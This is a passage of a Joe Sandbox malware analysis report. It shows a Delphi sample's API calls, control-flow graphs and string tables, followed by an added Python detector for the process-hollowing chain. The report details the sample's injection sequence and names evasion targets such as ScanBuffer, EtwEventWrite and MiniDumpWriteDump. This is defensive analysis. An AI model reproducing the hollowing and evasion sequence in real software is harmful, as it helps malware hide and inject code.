• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
• String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
• API String ID: 297057983-2644593349
• Opcode ID: ddd091142c2fa10b99aeca47ac0d49089f5828510c7961b313448d5e06840f2a
• Instruction ID: eef5c2b1240100df40b99183253018f484fb9522bc91bb9c17cf463cafd4a121
• Opcode Fuzzy Hash: ddd091142c2fa10b99aeca47ac0d49089f5828510c7961b313448d5e06840f2a
• Instruction Fuzzy Hash: 89140C34A4015DDBDB12EB65DCA0ADE73BAFF89304F5040A6D40AAB315DB30AE85CF65

Control-flow Graph
2dca620-2dca8b2 call 2dc894c * 2 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c * 5 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2dc8080 call 2dc894c * 2 6580->6805 6805->6061
APIs
  • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
  • Part of subcall function 02DC8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8814
• GetThreadContext.KERNEL32(000008EC,02E37424,ScanString,02E373A8,02DCA93C,UacInitialize,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,UacInitialize,02E373A8), ref: 02DC9602
  • Part of subcall function 02DC8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC8471
  • Part of subcall function 02DC8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC86D5
  • Part of subcall function 02DC7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A9F
  • Part of subcall function 02DC7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
• SetThreadContext.KERNEL32(000008EC,02E37424,ScanBuffer,02E373A8,02DCA93C,ScanString,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,000008F0,002A3FF8,02E374FC,00000004,02E37500), ref: 02DCA317
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008EC,00000000,000008EC,02E37424,ScanBuffer,02E373A8,02DCA93C,ScanString,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,000008F0,002A3FF8,02E374FC), ref: 02DCA324
  • Part of subcall function 02DC894C: LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
  • Part of subcall function 02DC894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
  • Part of subcall function 02DC894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 2388221946-51457883
• Opcode ID: 3032425bcd210af0f67fe28b5cb38d4a09720630055ccb6d331e783c6cd53049
• Instruction ID: 10ec85fc99957f77a740d07ac1447f70842a0d10f9c4786797e48e4311f4b4ab
• Opcode Fuzzy Hash: 3032425bcd210af0f67fe28b5cb38d4a09720630055ccb6d331e783c6cd53049
• Instruction Fuzzy Hash: 5CE2FD35A4115DDBDB16EB64DCA5BCE73BAEF84300FA041A6E006AB315DE30AE45CF61
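The APIs list of this function (and the shorter list under the second control-flow graph of the same function, entry 2dc8d6e, which stops after NtAllocateVirtualMemory) is the textbook process-hollowing sequence the report's "Sample uses process hollowing technique" signature refers to: CreateProcessAsUserW, GetThreadContext, NtReadVirtualMemory on the new process, NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, SetThreadContext and NtResumeThread, all on thread handle 000008EC. The memory operations are each wrapped in a small helper (02DC8400, 02DC8670, 02DC7A2C, 02DC7D78), while the context and resume calls are made directly. The Python below is an added example, not part of the Joe Sandbox output: it parses lines in exactly the report's APIs format and checks for that ordered chain, requiring the context/resume calls to agree on one thread handle and treating NtUnmapViewOfSection as optional. The two embedded inputs are copied from the lists on this page; the alias sets in HOLLOW_STEPS and the choice of which steps are mandatory are assumptions of the example.

```python
"""Flag the process-hollowing call chain in Joe Sandbox 'APIs' listings."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One "APIs" line of the report, called directly or via a wrapper ("Part of subcall function").
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[^(]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # "?" where the sandbox could not resolve an argument
    ref: str                 # address of the call instruction
    subcall: Optional[str]   # wrapper function address when the call is indirect

@dataclass
class HollowResult:
    complete: bool
    steps: List[ApiCall]     # chain steps found so far, in order
    thread_handle: Optional[str]

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(ApiCall(m["api"], m["module"].strip(), args, m["ref"].upper(), m["sub"]))
    return calls

# Hollowing chain in required order: (accepted API names, mandatory?). The alias
# sets are an assumption of this example, chosen to cover the Nt*/Win32 pairs.
HOLLOW_STEPS = [
    ({"CreateProcessW", "CreateProcessA", "CreateProcessAsUserW", "CreateProcessAsUserA"}, True),
    ({"GetThreadContext", "NtGetContextThread"}, True),
    ({"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}, False),  # some loaders overwrite in place
    ({"NtAllocateVirtualMemory", "VirtualAllocEx"}, True),
    ({"NtWriteVirtualMemory", "WriteProcessMemory"}, True),
    ({"SetThreadContext", "NtSetContextThread"}, True),
    ({"NtResumeThread", "ResumeThread"}, True),
]
THREAD_APIS = {"GetThreadContext", "NtGetContextThread", "SetThreadContext",
               "NtSetContextThread", "NtResumeThread", "ResumeThread"}

def detect_hollowing(calls: List[ApiCall]) -> HollowResult:
    """Walk the chain in order; a missing mandatory step stops the match."""
    steps, pos = [], 0
    for names, mandatory in HOLLOW_STEPS:
        hit = next((i for i in range(pos, len(calls)) if calls[i].api in names), None)
        if hit is None:
            if mandatory:
                return HollowResult(False, steps, None)
            continue
        steps.append(calls[hit])
        pos = hit + 1
    # The thread handle (first argument) must agree across the context/resume calls;
    # two different handles would be two operations, so hand that case to an analyst.
    handles = {c.args[0] for c in steps if c.api in THREAD_APIS and c.args and c.args[0] != "?"}
    if len(handles) > 1:
        return HollowResult(False, steps, None)
    return HollowResult(True, steps, handles.pop() if handles else None)

# Input copied from the APIs list of this report (function 2dc8d70).
REPORT_FULL = r"""
  • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
  • Part of subcall function 02DC8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8814
• GetThreadContext.KERNEL32(000008EC,02E37424,ScanString,02E373A8,02DCA93C,UacInitialize,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,UacInitialize,02E373A8), ref: 02DC9602
  • Part of subcall function 02DC8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC8471
  • Part of subcall function 02DC8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC86D5
  • Part of subcall function 02DC7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A9F
  • Part of subcall function 02DC7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
• SetThreadContext.KERNEL32(000008EC,02E37424,ScanBuffer,02E373A8,02DCA93C,ScanString,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,000008F0,002A3FF8,02E374FC,00000004,02E37500), ref: 02DCA317
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008EC,00000000,000008EC,02E37424,ScanBuffer,02E373A8,02DCA93C,ScanString,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,000008F0,002A3FF8,02E374FC), ref: 02DCA324
  • Part of subcall function 02DC894C: LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
  • Part of subcall function 02DC894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
  • Part of subcall function 02DC894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
"""
# The second graph's list (entry 2dc8d6e) stops after NtAllocateVirtualMemory: a partial chain.
REPORT_PARTIAL = "\n".join(REPORT_FULL.splitlines()[:7])

if __name__ == "__main__":
    for name, text in (("full", REPORT_FULL), ("partial", REPORT_PARTIAL)):
        r = detect_hollowing(parse_api_lines(text))
        print(name, r.complete, [c.api for c in r.steps], r.thread_handle)
```

Run against the full list the detector reports a complete chain on handle 000008EC; against the partial list it stops at the missing NtWriteVirtualMemory and returns the four steps it did see, which is the right outcome when a graph is cut off or a loader splits the work across functions. The LoadLibraryW/GetProcAddress/FreeLibrary triple from wrapper 02DC894C is deliberately not part of the chain: it is the loader's dynamic import resolver, called repeatedly on the DLL and export names listed under String ID, and belongs to a separate detection.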

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 6883 2dc8d6e-2dc8d73 6885 2dc8d78-2dc8d7d 6883->6885 6885->6885 6886 2dc8d7f-2dc8e66 call 2db4990 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6885->6886 6917 2dc8e6c-2dc8f47 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6886->6917 6918 2dca8b7-2dca921 call 2db4500 * 2 call 2db4c60 call 2db4500 call 2db44dc call 2db4500 * 2 6886->6918 6917->6918 6962 2dc8f4d-2dc9275 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db30d4 * 2 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4de0 call 2db4df0 call 2dc8788 6917->6962 7071 2dc92e8-2dc9609 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 
call 2dc89d0 call 2db2ee0 call 2db2f08 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 GetThreadContext 6962->7071 7072 2dc9277-2dc92e3 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6962->7072 7071->6918 7180 2dc960f-2dc9872 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8400 7071->7180 7072->7071 7253 2dc9b7f-2dc9beb call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 7180->7253 7254 2dc9878-2dc99e1 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8670 7180->7254 7281 2dc9bf0-2dc9d70 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7a2c 7253->7281 7344 2dc9a0b-2dc9a77 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 7254->7344 7345 2dc99e3-2dc9a09 call 2dc7a2c 7254->7345 7281->6918 7385 2dc9d76-2dc9e6f call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec 
call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8c80 7281->7385 7353 2dc9a7c-2dc9b7d call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7a2c 7344->7353 7345->7353 7353->7281 7436 2dc9e71-2dc9ebe call 2dc8b78 call 2dc8b6c 7385->7436 7437 2dc9ec3-2dca8b2 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7d78 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7d78 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 SetThreadContext NtResumeThread call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db2c2c call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc894c * 3 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc894c * 2 call 2db4860 call 2db49a0 call 2db47ec call 
2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c * 5 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2dc8080 call 2dc894c * 2 7385->7437 7436->7437 7437->6918
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8814
                                                                                                                                                                                                                                                                                                                                  • GetThreadContext.KERNEL32(000008EC,02E37424,ScanString,02E373A8,02DCA93C,UacInitialize,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,UacInitialize,02E373A8), ref: 02DC9602
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC8471
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC86D5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A9F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 3386062106-51457883

Control-flow Graph (rendered graph not reproduced; function at 2db5acc, blocks marked Executed / Not Executed)
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5AE8
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5B06
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5B24
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DB5B42
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DB5B8B
• RegQueryValueExA.ADVAPI32(?,02DB5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DB5BD1,?,80000001), ref: 02DB5BA9
• RegCloseKey.ADVAPI32(?,02DB5BD8,00000000,?,?,00000000,02DB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5BCB
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DB5BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DB5BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DB5BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DB5C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DB5C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DB5C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DB5CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DB5CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DB5CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DB5CEB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1759228003-2375825460

Control-flow Graph (rendered graph not reproduced; function at 2dc894c, blocks marked Executed / Not Executed)
APIs
• LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
  • Part of subcall function 02DC7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912

Control-flow Graph
